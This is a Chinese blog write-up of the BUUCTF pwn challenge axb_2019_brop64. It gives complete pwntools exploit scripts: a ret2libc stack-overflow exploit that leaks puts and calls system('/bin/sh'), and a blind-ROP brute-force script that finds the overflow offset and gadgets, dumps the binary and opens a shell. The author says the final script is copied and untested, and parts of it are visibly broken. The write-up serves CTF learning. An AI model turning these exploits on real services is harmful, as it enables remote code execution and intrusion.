[BUUCTF]PWN——axb_2019_brop64

最新推荐文章于 2023-12-26 23:51:45 发布
最新推荐文章于 2023-12-26 23:51:45 发布
阅读量1k 收藏 4
点赞数 1
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/112904455
版权

axb_2019_brop64

附件

步骤:

  1. 例行检查,64位程序,开启了nx
    在这里插入图片描述
  2. 本地试运行一下,看看大概的情况
    在这里插入图片描述
  3. 64位ida载入,第8行的read,明显的溢出漏洞
    在这里插入图片描述
  4. 采用常规的ret2libc的方法
    64位传参,要用到寄存器,先找个pop rdi
    在这里插入图片描述
    先是常规的泄露libc
p.recvuntil('Please tell me:')
payload='a'*(0xd0+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
p.sendline(payload)

puts_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\0'))

简单说一下怎么去看接收到的数据,写exp的时候设置一下环境变量,context.log_level="debug",然后去找recvived,找到0x400963,找个是我们pop_rdi的地址,后面跟着的就是puts@got,u64(p.recvuntil('\x7f')[-6:].ljust(8,'\0'))接收一下,用0补足8位
在这里插入图片描述
接下里就是计算system和bin/sh的位置,然后构造payload获取shell

libc=LibcSearcher('puts',puts_addr)
libc_base=puts_addr-libc.dump('puts')
system=libc_base+libc.dump('system')
binsh=libc_base+libc.dump('str_bin_sh')

payload='a'*0xd8+p64(pop_rdi)+p64(binsh)+p64(system)+p64(main)

完整exp

from pwn import *
from LibcSearcher import *

context.log_level="debug"
#p=process('./axb_2019_brop64')
p=remote('node3.buuoj.cn',25296)
elf=ELF('./axb_2019_brop64')

main=0x4007d6
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
pop_rdi=0x400963	

p.recvuntil('Please tell me:')
payload='a'*(0xd0+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
p.sendline(payload)

puts_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\0'))
success('puts_addr:'+hex(puts_addr))

libc=LibcSearcher('puts',puts_addr)
libc_base=puts_addr-libc.dump('puts')
system=libc_base+libc.dump('system')
binsh=libc_base+libc.dump('str_bin_sh')

payload='a'*0xd8+p64(pop_rdi)+p64(binsh)+p64(system)+p64(main)
p.sendline(payload)

p.interactive()

在这里插入图片描述

看题目brop64,感觉这题是不是应该不是这样做的,去百度了一下
参考资料https://www.anquanke.com/post/id/196722#h3-13
原理看上述的链接,我这边就记录一下怎么盲打

1. 首先来确定一下漏洞类型
尝试nc后发送%p、%s、%x等格式化控制字符,发现没有异常,不是格式化字符串漏洞
在这里插入图片描述
利用cyclic来生成想要长度的字符串,当生成到250长度的时候,发现报错了,存在溢出漏洞
在这里插入图片描述
2. 确定偏移量

def Force_find_padding():
    padding_length=0
    while True:
        try:
            padding_length=padding_length+1
            sh = process("./axb_2019_brop64")#正常来说应该写成sh = remote('node3.buuoj.cn', 26528),我这边为了爆破速度快一点用的本地
            sh.recvuntil("Please tell me:")
            sh.send('A' * padding_length)
            if "Goodbye!" not in sh.recvall():
                raise "Programe not exit normally!"
            sh.close()
        except:
            log.success("The true padding length is "+str(padding_length-1))
            return padding_length
    log.error("We don't find true padding length!")

padding_length=Force_find_padding()

在这里插入图片描述

3. 寻找stop gadget
此处我们希望我们能够爆破出main函数的首地址,进而直接让程序回到main函数进行执行
首先此处我们可以先泄露原来的返回地址,进而缩小爆破范围。

padding_length=216

sh.recvuntil("Please tell me:")
sh.send('A' * padding_length)
sh.recvuntil('A' * padding_length)
old_return_addr=u64(sh.recvuntil('Goodbye!').strip('Goodbye!').ljust(8,'\x00'))
log.info('The old return address is '+ hex(old_return_addr))

在这里插入图片描述
得到程序的基址0x400000
那么我们可以写出爆破脚本(爆破范围是0x0000~0xFFFF)

def Find_stop_gadget(old_return_addr,padding_length):
    maybe_low_byte=0x0000
    while True:
        try:
            sh = process("./axb_2019_brop64")
            sh.recvuntil("Please tell me:")
            sh.send('A' * padding_length + p16(maybe_low_byte))
            if maybe_low_byte > 0xFFFF:
                log.error("All low byte is wrong!")
            if "Hello" in sh.recvall(timeout=1):
                log.success("We found a stop gadget is " + hex(old_return_addr+maybe_low_byte))
                return (old_return_addr+padding_length)
            maybe_low_byte=maybe_low_byte+1
        except:
            pass
            sh.close()

stop_gadget=Find_stop_gadget(0x400000,216)

在这里插入图片描述

4. 寻找BROP gadget

def get_brop_gadget(length, stop_gadget):
	addr=0x400000
	while True:
		try:
			sh = remote('node3.buuoj.cn', 26528)
			sh.recvuntil('me:')
			payload = 'a' * length + p64(addr) + p64(0) * 6 + p64(stop_gadget) + p64(0) * 10
			sh.sendline(payload)
			if 'Hello' in sh.recvall(timeout=1):
				log.success("We found a brop gadget is " + hex(addr))
				return hex(addr)
			addr+=1
		except Exception:
			pass
			sh.close()

brop_gadget=get_brop_gadget(216,0x4007d6)

在这里插入图片描述

5. 寻找puts@plt

def get_puts_addr(length, rdi_ret, stop_gadget):
    addr = 0x400000
    while 1:       
        try:
        	sh = process("./axb_2019_brop64")
        	sh.recvuntil('me:')
        	payload = 'A' * length + p64(rdi_ret) + p64(0x400000) + p64(addr) + p64(stop_gadget)
        	sh.sendline(payload)
		if "ELF" in sh.recvall(timeout=1):
			log.success("We found puts addr is " + hex(addr))
			return hex(addr)
		addr+=1
        except:
	    pass
            sh.close()
puts_addr=get_puts_addr(216, 0x40095a+9, 0x4007d6)

在这里插入图片描述
6. 利用puts@plt,Dump源文件

def Dump_file(func_plt,padding_length,stop_gadget,brop_gadget):
    process_old_had_received_length=0
    process_now_had_received_length=0
    file_content=""
    while True:
        try:
            sh = process("./axb_2019_brop64")
            while True:
                sh.recvuntil("Please tell me:")
                payload  = 'A' * (padding_length - len('Begin_leak----->'))
                payload += 'Begin_leak----->'
                payload += p64(brop_gadget+9) # pop rdi;ret;
                payload += p64(0x400000+process_now_had_received_length)
                payload += p64(func_plt)
                payload += p64(stop_gadget)
                sh.send(payload)
                sh.recvuntil('Begin_leak----->' + p64(brop_gadget+9).strip('x00'))
                received_data = sh.recvuntil('x0AHello')[:-6]
                if len(received_data) == 0 :
                    file_content += 'x00'
                    process_now_had_received_length += 1
                else :
                    file_content += received_data
                    process_now_had_received_length += len(received_data)
        except:
            if process_now_had_received_length == process_old_had_received_length :
                log.info('We get ' + str(process_old_had_received_length) +' byte file!')
                with open('axb_2019_brop64_dump','wb') as fout:
                    fout.write(file_content)
                return
            process_old_had_received_length = process_now_had_received_length
            sh.close()
            pass

Dump_file(puts_addr,padding_length,stop_gadget,brop_gadget)

不懂什么情况,我dump不下来,就一直卡在这边
在这里插入图片描述
7. 最后是拖进ida里面,重新定义基址后找到got表,然后leak libc基址rop就行了
后面没亲测一下,具体的还是看原文

贴一下最后的exp

from pwn import *
import binascii
import sys
context.log_level='debug'
context.arch='amd64'

libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")

def get_sh():
    if args['REMOTE']:
        return remote(sys.argv[1], sys.argv[2])
    else:
        return process("./axb_2019_brop64")

def Force_find_padding():
    padding_length=0
    while True:
        try:
            padding_length=padding_length+1
            sh = get_sh()
            sh.recvuntil("Please tell me:")
            sh.send('A' * padding_length)
            if "Goodbye!" not in sh.recvall():
                raise "Programe not exit normally!"
            sh.close()
        except:
            log.success("The true padding length is "+str(padding_length-1))
            return padding_length
    log.error("We don't find true padding length!")

def Find_stop_gadget(old_return_addr,padding_length):
    maybe_low_byte=0x0000
    while True:
        try:
            sh = get_sh()
            sh.recvuntil("Please tell me:")
            sh.send('A' * padding_length + p16(maybe_low_byte))
            if maybe_low_byte > 0xFFFF:
                log.error("All low byte is wrong!")
            if "Hello" in sh.recvall(timeout=1):
                log.success("We found a stop gadget is " + hex(old_return_addr+maybe_low_byte))
                return (old_return_addr+padding_length)
            maybe_low_byte=maybe_low_byte+1
        except:
            pass
            sh.close()

def Find_brop_gadget(libc_csu_init_address_maybe,padding_length,stop_gadget):
    maybe_low_byte=0x0000
    while True:
        try:
            sh = get_sh()
            sh.recvuntil("Please tell me:")
            payload  = 'A' * padding_length 
            payload += p64(libc_csu_init_address_maybe+maybe_low_byte) 
            payload += p64(0) * 6 
            payload += p64(stop_gadget) + p64(0) * 10
            sh.send(payload)
            if maybe_low_byte > 0xFFFF:
                log.error("All low byte is wrong!")
            if "Hello" in sh.recvall(timeout=1):
                log.success(
                    "We found a brop gadget is " + hex(
                        libc_csu_init_address_maybe+maybe_low_byte
                    )
                )
                return (libc_csu_init_address_maybe+maybe_low_byte)
            maybe_low_byte=maybe_low_byte+1
        except:
            pass
            sh.close()

def Find_func_plt(func_plt_maybe,padding_length,stop_gadget,brop_gadget):
    maybe_low_byte=0x0600
    while True:
        try:
            sh = get_sh()
            sh.recvuntil("Please tell me:")
            payload  = 'A' * padding_length 
            payload += p64(brop_gadget+9) # pop rdi;ret;
            payload += p64(0x400000)
            payload += p64(func_plt_maybe+maybe_low_byte)
            payload += p64(stop_gadget)
            sh.send(payload)
            if maybe_low_byte > 0xFFFF:
                log.error("All low byte is wrong!")
            if "ELF" in sh.recvall(timeout=1):
                log.success(
                    "We found a function plt address is " + hex(func_plt_maybe+maybe_low_byte)
                )
                return (func_plt_maybe+maybe_low_byte)
            maybe_low_byte=maybe_low_byte+1
        except:
            pass
            sh.close()

def Dump_file(func_plt,padding_length,stop_gadget,brop_gadget):
    process_old_had_received_length=0
    process_now_had_received_length=0
    file_content=""
    while True:
        try:
            sh = get_sh()
            while True:
                sh.recvuntil("Please tell me:")
                payload  = 'A' * (padding_length - len('Begin_leak----->'))
                payload += 'Begin_leak----->'
                payload += p64(brop_gadget+9) # pop rdi;ret;
                payload += p64(0x400000+process_now_had_received_length)
                payload += p64(func_plt)
                payload += p64(stop_gadget)
                sh.send(payload)
                sh.recvuntil('Begin_leak----->' + p64(brop_gadget+9).strip('x00'))
                received_data = sh.recvuntil('x0AHello')[:-6]
                if len(received_data) == 0 :
                    file_content += 'x00'
                    process_now_had_received_length += 1
                else :
                    file_content += received_data
                    process_now_had_received_length += len(received_data)
        except:
            if process_now_had_received_length == process_old_had_received_length :
                log.info('We get ' + str(process_old_had_received_length) +' byte file!')
                with open('axb_2019_brop64_dump','wb') as fout:
                    fout.write(file_content)
                return
            process_old_had_received_length = process_now_had_received_length
            sh.close()
            pass


padding_length=216
if padding_length is null:
    padding_length=Force_find_padding()

old_return_addr=0x400834
if old_return_addr is null:
    sh.recvuntil("Please tell me:")
    sh.send('A' * padding_length)
    sh.recvuntil('A' * padding_length)
    old_return_addr=u64(sh.recvuntil('Goodbye!').strip('Goodbye!').ljust(8,'x00'))
    log.info('The old return address is '+ hex(old_return_addr))

stop_gadget=0x4007D6
if stop_gadget is null:
    stop_gadget=Find_stop_gadget(old_return_addr & 0xFFF000,padding_length)

brop_gadget=0x40095A
if brop_gadget is null:
    brop_gadget=Find_brop_gadget(old_return_addr & 0xFFF000,padding_length,stop_gadget)

func_plt=0x400635
if func_plt is null:
    func_plt=Find_func_plt(old_return_addr & 0xFFF000,padding_length,stop_gadget,brop_gadget)

is_dumped=True
if is_dumped is not True:
    Dump_file(func_plt,padding_length,stop_gadget,brop_gadget)
    is_dumped=True

sh = get_sh()
puts_got_addr=0x601018
puts_plt_addr=0x400640

payload  = 'A' * (padding_length - len('Begin_leak----->'))
payload += 'Begin_leak----->'
payload += p64(brop_gadget+9) # pop rdi;ret;
payload += p64(puts_got_addr)
payload += p64(puts_plt_addr)
payload += p64(stop_gadget)
sh.recvuntil("Please tell me:")
sh.send(payload)
sh.recvuntil('Begin_leak----->' + p64(brop_gadget+9).strip('x00'))
puts_addr = u64(sh.recvuntil('x0AHello')[:-6].ljust(8,'x00'))
libc_base = puts_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
bin_sh_addr = libc_base + libc.search('/bin/sh').next()
payload  = 'A' * padding_length
payload += p64(brop_gadget+9) # pop rdi;ret;
payload += p64(bin_sh_addr)
payload += p64(system_addr)
payload += p64(stop_gadget)
sh.recvuntil("Please tell me:")
sh.send(payload)
sh.recv()
sh.interactive()
sh.close()

我果然还是太菜了,照着大佬的分析都没做到最后。在这里插入图片描述

BUUCTF axb_2019_fmt32
BengDouLove的博客
04-16 1579
主程序就是这样的,能看到有一个printf的格式化字符串漏洞 sprintf 相当于把参数替换了之后的格式化字符串送入了第一个参数,也就是format 首先,没有后门也没有系统函数,要用格式化字符串泄露出牟哥libc函数,来获得libc基址 然后,仔细算一下 s 和 format 两个参数,都没有溢出,,也没有函数能写进got表,,所以还是再次利用格式化字符串漏洞通过%n来写入数据 先看...
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 595
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
[BUUCTF-pwn]——axb_2019_brop64
Y_peak的博客
03-17 335
[BUUCTF-pwn]——axb_2019_brop64 利用这里leek地址, 找到libc基地址进而找到system, binsh,构造rop链 exploit from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',26212) #p = process('./axb_2019_brop64') elf = ELF('./axb_2019_brop64') context.log_level = 'debug
axb_2019_brop64
qq_62887641的博客
10-03 205
64位,只开了NX程序很简单,有一点点花里胡哨,看到栈溢出,看一下有没有坑点(x。
[BUUCTF]PWN——axb_2019_heap(格式化字符串,off-by-one,unlink)
mcmuyanga的博客
01-26 825
axb_2019_heap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,经典的堆题的菜单 64位ida载入 main() banner()
BUUCTF刷题6
m0_51251108的博客
11-03 447
题目:gyctf_2020_some_thing_exceting:mrctf2020_shellcode_revenge:axb_2019_brop64:inndy_echo:wustctf2020_name_your_cat:wdb2018_guess:oneshot_tjctf_2016:zctf2016_note2:ciscn_2019_final_2:wustctf2020_number_game: gyctf_2020_some_thing_exceting: 这题存在uaf漏洞 程序开始时读入
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 290
BUUCTF 做题练习
[BUUCTF-pwn]——axb_2019_fmt64
Y_peak的博客
03-09 429
[BUUCTF-pwn]——axb_2019_fmt64 题目地址:(https://buuoj.cn/challenges#axb_2019_fmt64)[https://buuoj.cn/challenges#axb_2019_fmt64] 这是一道格式化字符串漏洞利用的题目 checksec 一看,竟然连canary都没开,不过开不开好像都木有什么用。 在IDA中看看,可以看出明显的字符串漏洞 首先当然是计算偏移了,发送aaaa%4$x, 比较习惯发送这个hhhh。发现距离栈顶是3,还有五个寄
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4124
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
buuoj Pwn writeup 86-90
yongbaoii的博客
03-08 268
86 axb_2019_brop64 保护 花里胡哨的。 平平无奇栈溢出。 from pwn import * context.log_level="debug" r = remote('node3.buuoj.cn',29649) elf = ELF('./86') libc = ELF("./64/libc-2.23.so") main=0x4007d6 puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] pop_rdi=0x400963 r.r
BUUOJ PWN 81-100
2h4ox1n9
12-17 372
81、pwnable_hacknote 82、jarvisoj_level5 83、hitcon2014_stkof 84、cmcc_pwnme2 85、actf_2019_babystack 86、npuctf_2020_easyheap 87、picoctf_2018_can_you_gets_me 88、picoctf_2018_got_shell 89、[BJDCTF 2nd]snake_dyn 90、axb_...
BUUCTF 周练 Week1
weixin_44229639的博客
11-03 2811
Week 1 Q1 axb_2019_brop64(这题本来是盲打,buuoj给了源文件难度减少了很多) ​ IDA分析发现,read函数长度存在栈溢出 ​ checksec结果,没有Canary和PIE,可直接利用栈溢出构造rop ​ 本题靶机使用的是Ubuntu16 ​ 使用libc-2.23.so (或者可使用LibcSearcher 寻找对应libc) 构造rop思路: ​ 在此之前 puts函数已被调用,其GOT表被覆盖为真实的函数地址,可利用ROPgadget 得到real_puts_
PWN】初见BROP
2301_77342543的博客
07-29 300
第一次BROP,它让我觉得pwn,或者说网安很妙,也很折磨在遇到它之前,之前接触的题目都是简单的栈溢出,感觉没有啥有趣的,很简单,找gadget溢出就可以,一切都看得见可遇到它之后,这是真的折磨,一切都是未知但是因为未知,所以产生了美感,或许是因为摸不着,所以才有一种神秘的魔力一点点吸引我学pwnBROP(Blind ROP),于 2014 年由 Standford 的 Andrea Bittau 提出,这种攻击方式是实现在无源代码和二进程程序的情况下对运行中的程序进行攻击。
Pwn中阶学习1-[栈溢出]/篇3
m0_52343643的博客
04-14 1580
这种题型一般是在题目没有给出程序文件的时候,我们对程序一无所知,对程序是否栈溢出、栈溢出长度、gadget地址,源函数地址等只能进行爆破得到 攻击条件: 程序存在栈溢出漏洞 服务器端的进程在崩溃后会重新启动,且启动进程地址与先前一样。目前 nginx, MySQL, Apache, OpenSSH 等服务器应用都是符合这种特性的。 BROP绕过ASLR、NX、Canary保护 步骤 爆破栈溢出长度 得到漏洞函数或main函数地址(stop gadget:使程序返回地
[BUUCTF-pwn] xm_2019_awd_pwn1
weixin_52640415的博客
12-21 313
乍一看以为这题有多简单,直接给个溢出,还没有canary ssize_t vuln() { char buf[32]; // [rsp+0h] [rbp-20h] BYREF setbuf(stdin, buf); return read(0, buf, 0x100uLL); } 再一看就有点意思了: got表就两项 .got.plt:0000000000601000 _GLOBAL_OFFSET_TABLE_ dq offset _DYNAMIC .got.plt:0000000
BUUCTF-PWN刷题记录-8
weixin_44145820的博客
04-16 936
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
CTF-PWN-栈溢出-中级ROP-【BROP-2】
最新发布
llovewuzhengzi的博客
12-26 1227
此时将输出函数puts在got表中的地址作为参数,调用puts函数,从而得到puts的真实地址,进而得到libc基地址。注意此时不要关闭传输通道,不然进程再次重启,对应的puts的真实地址会改变,其libc基地址也会改变,所以此时得到puts函数真实地址后跳转到主函数(返回地址是stop_addr),然后计算得到libc基地址和system地址和/bin/sh的地址,然后再次输入构造的ROP链即getshellput_got_addr=0x601018 # 查看binary_file找到got表的地址。
CTF-PWN-栈溢出-中级ROP-【BROP-1】
llovewuzhengzi的博客
12-26 1334
此时得到二进制文件后,找到输出函数的对应plt位置,找到其中跳转指令中存在输出函数在got表的地址,然后再次输出,此时参数为输出函数在got表中的地址,此时可以得到输出函数的真实地址,最后得到libc基地址并计算出/bin/sh的地址和system的地址,如果没有此时可以利用read函数或write函数写入可写的内存,参数自己构造,所以知道地址,然后调用系统调用或system都行,只不过系统调用还需构造其他参数。即没有得到源码或者可执行程序文件的情况的文件下,只有一个提供的功能端口进行攻击。
[BUUCTF]PWN——axb_2019_fmt32
mcmuyanga的博客
11-19 1718
axb_2019_fmt32 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入 alarm(),是闹钟函数,主要功能是设置信号传送闹钟,即用来设置信号SIGALRM在经过参数seconds秒数后发送给目前的进程。如果未设置信号SIGALARM的处理函数,那么alarm()默认处理终止进程 25行,明显的格式化字符串漏洞 这题没有后门函数,也没有系统函数,要用格式化字符串泄露出某个libc函数,来获得libc基址 s 和 format 两个参数
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值